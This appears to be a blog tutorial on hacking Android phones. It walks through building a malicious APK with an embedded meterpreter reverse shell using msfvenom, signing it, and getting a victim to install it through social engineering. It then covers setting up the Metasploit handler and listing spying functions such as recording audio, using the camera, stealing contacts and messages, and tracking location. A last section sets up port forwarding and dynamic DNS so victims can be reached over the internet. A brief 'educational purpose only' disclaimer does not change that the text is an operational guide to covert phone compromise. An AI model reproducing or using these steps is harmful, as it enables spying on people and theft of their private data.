You have most likely heard about essentially the most famous hacking framework called Metasploit. This framework is one of many most used pentesting frameworks which by default is included in Kali Linux. All the professional hackers recommend Metasploit as their ideal tool for hacking and exploitation of android telephones as well and windows devices. It also has loads of modules for hacking IOS. The Metasploit and msfvenom are considered the most effective combination for hacking android devices.
What is msfvenom?
Msfvenom is an android hacking framework used for making hacking apk files which have embedded reverse shells which can be utilized for hacking android devices. This tool was not present in backtrack however is now present in Kali Linux as a separate option to make android hacking as easy as doable. We might be using Metasploit and msfvenom together for this hack.
So why is Metasploit so great?
Metasploit built by rapid7 is a community-based project. It has quite a few exploits and hacks made and optimized by the community. The better part is that it’s free.
So today we’re going to guide you on how to hack android telephone using Metasploit and MSFVenom.
For performing this hack using Metasploit or msfvenom, you’ll want Kali Linux OS installed in your computer and Android Phone as a target. And clearly, internet connection is a must.
This tutorial is for educational purpose only. Please remember that hacking is against the law unless you’ve permission from the account owner and the parties involved. This post ought to be used as a tool to assist people perceive how hackers are hacking android devices with Metasploit and msfvenom. Our team/web site shall not be held responsible if any criminal prices are brought against any one who misuses the information on this web site to violate the law.
Below are the steps to perform this hack using Metasploit or msfvenom. So let’s start hacking.
Step 1: Creating a malicious apk file
Open your KALI LINUX. Open your Terminal and type within the following command
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.78.129 LPORT=4444 R > hackingworld.apk
**LHOST= YOUR IP address
**Use ifconfig to find your IP address in case you don`t know.
Step 2: Delivering APK file to the victim
You have now created your malicious spyware .apk file using Metasploit and msfvenom. It might be saved to your /home/ folder by default. Find your newly created hackingworld.apk and send it to your target (hackingworld.apk). Use social engineering to do that in order that the victim does install the apk.
**If you get any signing errors or issues use the next:
Keytool (Comes Pre-Installed in Kali Linux)
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Jarsigner (Comes Pre-Installed in Kali Linux)
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore hackingworld.apk aliasname
jarsigner -verify -verbose -certs hackingworld.apk
Step 3: Metasploit setup
Open up a brand new terminal and use the next command to start Metasploit framework.
Now within the Metasploit framework console type the next
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.78.129
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
**LHOST= YOUR IP address
Now when the user opens up the app on his/her telephone, you’ll get a session with that device. And whoa! The device is yours to operate. Metasploit and msfvenom usually are not that difficult to make use of however want very methodology steps that must implement.
Step 4: Exploit..!!!
The second the victim opens the application on their device, you’ll get a meterpreter shell on the Kali Linux terminal.
You have now successfully hacked the android device using Metasploit and msfvenom
Some commands it is best to attempt using Metasploit and msfvenom:
Records the audio from the android device and stores it on the local drive.
Lets you are taking the images by hacking the android camera of the device
Lets you stream live video from the hacked android camera
Lets you hack and copy all of the contacts from the victim’s telephone.
Lets you hack the victim’s messages and stored it in a text file in your system.
Helps you track the hacked device by location
So, that is how hackers hack using Metasploit and msfvenom on the local network. But what if we desired to hack android devices with Metasploit over the web.
So now for some advanced stuff…
Hacking Over the web with Metasploit and msfvenom
So what if we desired to make the hack work anywhere on the earth. What can we do to make the hack global in order that we may hack anybody over the web with out buying any costly server?
Step 1: We want a router which might port forwarding feature. This is a must for hacking over the web with Metasploit.
Step 3: Next, we’d like dynamic IP for msfvenom and Metasploit to work over the web, so go to noip.com and join. After signing up,
Click on Add Host and enter any name for the host. Click on save the host.
Step 4: Now Download DUC from the official web site or click here. Install the DUC client and check in to your account. Once you do the IP address in your system will automatically be updated within the DNS. In case this doesn`t occur, you possibly can manually configure the DNS.
Step 5: Click on add hosts on the DUC client as shown. If done properly, you’ll get all three green ticks.
Set the right host
All the settings are set
Step 6: Now, we’d like the gateway IP to port forward from our router settings. So type “ifconfig” within the command prompt, and you’ll get the gateway IP.
Step 7: Now open any browser you’ve and paste the gateway IP there. It will prompt the login page. Enter the username and password of your router (by default both is admin for many routers).
Step 8: Now navigate to the port forwarding option. Depending upon the router brand, the page is perhaps at a special location, however the underlying principle is similar.
Step 9: Click on Add Port and put worth Add port 2222 again and keep it. You can put any port number you want.
Step 10: Now, whereas setting up the 2 commands rather than my local IP use the ddns you only made on no IP.
So in my case, it might be nightfury007.dns.net rather than 192.168.78.129
Step 15: Now, the rest of the tactic is similar. You have to make use of social engineering to make the victim install the APK on their device. This part is something it’s a must to do by yourself. It’s as much as your creativity.
Step 16: You have successfully hacked into the victim’s telephone as quickly as they install and open it.
Step 17: You needn’t use NOIP you possibly can rather than your public IP address whereas making the apk and setting up Metasploit. But the problem is the public Ip address retains sometimes changing, so making use of public IP might be a brief solution. Just google whats my IP to find your public IP address
Step 18: If you’re having any issues with the no IP client. Do not use it instead, just directly use your public IP. Port forwarding is required by default on all hacking methods over the web.
Hope you all have enjoyed the session on hacking android mobiles with ease. Do not forget to share your comments.